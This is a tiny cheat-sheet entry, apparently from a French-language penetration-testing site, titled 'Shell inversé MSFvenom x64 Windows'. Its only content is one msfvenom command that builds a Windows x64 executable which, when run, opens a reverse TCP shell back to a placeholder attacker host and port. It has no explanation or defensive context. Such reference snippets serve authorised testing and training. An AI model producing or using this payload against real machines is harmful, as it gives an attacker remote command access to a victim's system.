Shell inversé MSFvenom x64 Windows

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
Breakable Bug